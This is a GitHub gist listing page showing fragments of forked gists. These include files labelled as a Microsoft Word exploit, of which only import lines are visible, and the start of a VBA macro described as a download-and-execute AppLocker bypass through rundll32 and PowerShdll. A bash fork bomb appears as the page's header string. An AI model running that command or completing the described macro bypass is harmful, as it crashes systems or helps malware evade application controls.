:(){ :|:& };: Celestial-intelligence
Celestial-intelligence
/ exploit.py
Created
March 2, 2020 10:42
— forked from bedekelly/exploit.py
Microsoft Word Exploit - Original
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import os | |
| import warnings | |
| import zlib | |
| sys.path.append(os.getcwd() + '/' + "pylzma.egg") | |
| import pylzma | |
| import struct | |
| import random | |
| import shutil | |
| from zipfile import ZipFile |
Celestial-intelligence
/ partials.py
Created
March 2, 2020 10:42
— forked from bedekelly/partials.py
Graceful partial functions in Python. https://github.com/bedekelly/minitest for test library used.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import inspect | |
| from minitest import case, tests | |
| from functools import wraps, partial | |
| def makepartial(fn): | |
| """ | |
| This function is a decorator which allows functions with a fixed | |
| number of arguments gracefully to be transformed into partial functions | |
| given too few arguments to execute. |
Celestial-intelligence
/ cleaned_exploit.py
Created
March 2, 2020 10:42
— forked from bedekelly/cleaned_exploit.py
Cleanup in Progress - MS Word Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import os | |
| import warnings | |
| import zlib | |
| import struct | |
| import random | |
| import shutil | |
| import zipfile | |
| from zipfile import ZipFile | |
| import time |
Celestial-intelligence
/ macro_download_and_execute_rundll32_powershdll_powershell.vba
Created
May 28, 2019 15:59
— forked from egre55/macro_download_and_execute_rundll32_powershdll_powershell.vba
macro - download and execute applocker bypass (rundll32 / powershdll / powershell)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' based on | |
| ' https://stackoverflow.com/questions/17877389/how-do-i-download-a-file-using-vba-without-internet-explorer | |
| ' | |
| ' PowerShdll.dll by @p3nt4 | |
| ' https://github.com/p3nt4/PowerShdll | |
| ' | |
| ' rundll32 is a good candidate as blocking this abuse binary impacts certain Windows functionality - RDP/Office right-click | |
| ' shortcuts, and "run-as" a non-privileged user (perhaps a functionality edge-case) | |
| Sub Document_Open() |